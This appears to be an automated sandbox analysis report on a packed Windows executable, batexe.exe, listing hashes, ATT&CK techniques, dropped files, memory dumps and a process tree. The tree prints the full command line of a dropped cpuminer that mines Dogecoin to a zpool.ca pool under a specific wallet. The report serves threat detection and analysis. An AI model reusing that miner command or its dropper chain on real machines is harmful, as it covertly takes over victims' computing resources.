73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
299s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
11/02/2024, 19:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
5012	b2e.exe
4760	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4760	cpuminer-sse2.exe
4760	cpuminer-sse2.exe
4760	cpuminer-sse2.exe
4760	cpuminer-sse2.exe
4760	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/5804-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 5804 wrote to memory of 5012	5804	batexe.exe	85
PID 5804 wrote to memory of 5012	5804	batexe.exe	85
PID 5804 wrote to memory of 5012	5804	batexe.exe	85
PID 5012 wrote to memory of 5492	5012	b2e.exe	86
PID 5012 wrote to memory of 5492	5012	b2e.exe	86
PID 5012 wrote to memory of 5492	5012	b2e.exe	86
PID 5492 wrote to memory of 4760	5492	cmd.exe	89
PID 5492 wrote to memory of 4760	5492	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5804
- C:\Users\Admin\AppData\Local\Temp\5F18.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\5F18.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\5F18.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:5012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\61F6.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5492
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4760

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5F18.tmp\b2e.exe

Filesize
9.0MB

MD5
0d92d9fa564bf498f57b3570b547590f

SHA1
3b50360e9d6c16bc5af3d9452d6b0a48b6cb3717

SHA256
28211e70b12e3476160845d6e14c63e0cc70f97eb1446ec21566e7e9bfde2a1e

SHA512
beaa958739cabcf466f6a7f90a687efc580624c6538cfc7937dc526be2d474981ee95000c55e3e2013beeb28cdd3d444659da818f969ea131542fce30d2773a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\5F18.tmp\b2e.exe

Filesize
3.2MB

MD5
a27a472833af38ebcec50d9d68ca5bfd

SHA1
a237bbb1cf3685d497469ec27627dbb09cc323fe

SHA256
019d8b6b866ef20bf48c3ade7d8f82de2b5fbedbd9addf2229a0cbfeb8996c21

SHA512
77aea69ee1e6dee322a4145ba6c26db46cf87dccbd62d9c75c456ac06fdc19d42277e9f36d57253db147de0a66ae85a82fd7493b9af922e85ef4dc565451bae7

Download Submit
C:\Users\Admin\AppData\Local\Temp\5F18.tmp\b2e.exe

Filesize
5.1MB

MD5
2ec88d89e99b465384b322cdeafaee28

SHA1
5f4ddf80350a1d995b06b00989530bbb61c7572c

SHA256
412ec2beb8d3c7dbd797fb81052e3b22d812b38477467706b6aedddf8141d7c5

SHA512
3fbf8f048d5749c4b331577cb29f070fff02be314324e104af0f9f8a4fd05d85c7ba000d79a2201220363da70e60cf8e12b3512a0bc63747bc08eb7f2699c61d

Download Submit
C:\Users\Admin\AppData\Local\Temp\61F6.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
886KB

MD5
d482c9617891b7820c2981cc2f167961

SHA1
0acc9f902d516cbbeef511e887d496d637673539

SHA256
28e3c73338cbd4d51a07c14ca1da67a7cc464696c8a2ca0aadf9d5a9a20e7d9c

SHA512
e482d15315c74680056d1bde6b7c2f0c20143c4eaee799fed5c3684c2fb09edab195e31ff2d9022adcc08153f9599ce2c5d12d3c944455c2a45ba5c201a175db

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
636KB

MD5
e146263765e0391e1bc021aa8ff74404

SHA1
e878f29a4dc68f80e765b468a64120d7b86319b8

SHA256
fec94b583fe68ef38715176252504a87ae67a248f713698de04b940f5007a27e

SHA512
0bd026ed8287dbf3accf687dfea89015d1fcd0931d4a700c17c925b9201d5861a5f20bec1bee67a9327f32e2671d431509a2223826a0e8a77bbff0589d0bab14

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
698KB

MD5
2d38ae80b8a6d28d95e7d68a47f305f6

SHA1
8e322eb6c75d83ffdc706cf921b0e5c5917da2e3

SHA256
9ceba50ee1ffb4e7db4b3bc2cca49a6f1cd4b9ec27bb13298fc27af97d85abd6

SHA512
ed23536df785fe48d3a1eee4ceb2913304b048fb95bb9cc425cfa3787f0f5f2f0026b248a318ce8d90d953b18a36e02f9fb9f6562b838b4c6b80e42ea256ae1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
614KB

MD5
bbdcfaae1fccf33708f88ff47fe39949

SHA1
4a3b9ce69a61a0eca5042a0767feede7fb4a70d9

SHA256
18e14a5c37d9d760838aaadf03fb58f7feb414dfd89db5b50fd5470c5489a406

SHA512
3722610bdd38de8a6f2f048bfe39ecc0fb6b5b94413d0c676f5f699878aaceca07b45fd691c140e7b038c55d7c427fb7e40625b54ce00259cbd02a9fc21c3b30

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
743KB

MD5
c47fd9b293813763ff33099094960849

SHA1
42dbbed3bbf32a812c99ffefcfb848155b217232

SHA256
7ce1785c3916a47257bf716ce3f67a26e53e95a4a7511a98fff14789985902f3

SHA512
f35db1c9ee59b8e2438a7429937b044629df08489785be9711d856e7212a1c814f5f4e439e7fba2495ea33119caffe88a516650eb07d1e3864bb64d55ad08599

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
448KB

MD5
655c39fb383b8ec156c1bb0233208f48

SHA1
d9303754de3262d00bb3880f684cb4403980e620

SHA256
80c23d92c5924298cac1a9cc66a00751ef05d488c9cfa1f089f7cca715f70607

SHA512
0cbd8fde23a2cce742400030925e6e24d85c11edce5fe7aa70ba5316e5022a0bd598761268d921ea87bfb5f37aab05bba219b3deb076c66bd21b04c021f1f5f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
745KB

MD5
63744eb54278002b2681842ca31c7553

SHA1
c255310fb4a762c94f02f2373017049c3d4a9bf0

SHA256
2bfe6a044e74564bb8edba56ac80a67790dff8b5401f48f096b4e26830a9600c

SHA512
9a7c06947b353fb2b5f0d08a7b41e8744bd60bb9add6cdfe6894da88b96e813fd2f705e40dd7d1a215a09294c9770d4a2d9cc07e94c81aa2c7f46a4bf108ac1c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
462KB

MD5
dfddbe712a8ad4f884d7c8788016c8b8

SHA1
3d938cb2944dec55d17ff0101e73496183b6fa4a

SHA256
8e3f117f4204442d380b477d172d1c16c96b7e6c6c706fa76234b5813c9212c6

SHA512
03f7e9d400bcc9a09aca1afaf93ce4ff557e8c3ecdc2c9da098b0d5a249a396707d9c8ac14789d4aabfbb6d19cc5dbcf07f15b41964ca49e208e80d875e7b8d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
483KB

MD5
d9af634940e74681a34cebcc75e66e9b

SHA1
cc507f5f2cc66ceb753f139f82f6e4931fea5771

SHA256
4d38d7e860adf7a10416d50178f6624e0a033739d7199c5ebc467475fe437547

SHA512
d065f3db44913b7cc873c563acb3c452f1d046d41c63eac2dc34e7b82e0c7c0ec9e73ff504660e1800f6cc57830531838a7a02c06e9efda39ef0677d77277e31

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
445KB

MD5
c1e8af0ac33a55e0a03e78798d496d67

SHA1
a375656c5f77fa35894a0e667ca1fee02f86548a

SHA256
b76b3360946b8d13ce7a3283bb0e3e617d9f61b46d6af4634ab7466322cb9a16

SHA512
d68cc2feb4202e296e6a3f1fdd03949cd20ccd684cd85490886696fdd7c9537e86f513b629ee60355c723c762a1b61d48621e61eef34ff7901a3789020a15bbb

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
514KB

MD5
a6ddfcd70f9e035fc1da16703205fc2c

SHA1
692921172c317bab9394c2abdd3f28ffdb87f881

SHA256
d84cce6c299a807150b19b99a43c243a5f17a641b63cb479e39d0d70223dbb7e

SHA512
41156428114187ccf1ebe2f920d46dd151fb50ac1a94bfcd3a8d3ea6503425e5196c564827b2ec3a2f5c8352e5f3f0a9b4e218f58d263592e8f69356757f3559

Download Submit
memory/4760-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4760-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4760-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4760-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4760-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4760-46-0x00000000721E0000-0x0000000072278000-memory.dmp

Filesize
608KB

Download
memory/4760-47-0x0000000001120000-0x00000000029D5000-memory.dmp

Filesize
24.7MB

Download
memory/4760-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4760-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4760-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4760-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4760-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4760-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4760-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4760-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4760-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5012-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5012-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5804-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download